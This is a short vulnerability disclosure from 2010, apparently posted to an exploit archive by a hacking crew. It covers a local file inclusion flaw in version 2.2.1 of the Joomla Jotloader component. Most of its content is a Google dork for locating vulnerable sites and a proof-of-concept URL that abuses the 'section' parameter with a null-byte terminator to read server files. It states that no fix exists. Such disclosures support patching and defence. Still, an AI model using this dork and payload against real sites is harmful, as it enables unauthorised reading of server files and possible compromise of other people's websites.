Joomla Component Jotloader 2.2.1 Local File Inclusion Vulnerability

2010-12-20 16:15:09

) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ /
\ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | ' <
|_| \___/ \___| |_| /_/ \_\ \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
.WEB.ID
-----------------------------------------------------------------------
Joomla Component Jotloader 2.2.1 Local File Inclusion Vulnerability
-----------------------------------------------------------------------
Author : v3n0m (v3n0m666[at]live[dot]com)
Site : http://yogyacarderlink.web.id/
Date : December, 20-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00

Application : JotLoader
License : GPLv2
Version : 2.2.1 Other versions may also be affected
Vendor : http://www.kanich.net/radio/site/jotloader
Google Dorks : inurl:com_jotloader

Exploit & p0c
_____________

**[LFI]
http://127.0.0.1/[path]/index.php?option=com_jotloader&section=[LFI]%00
_________________________________________________

All YOGYACARDERLINK Crew & My Beloved Jovita Andy
_________________________________________________

Fixes

No fixes

In order to submit a new fix you need to be registered.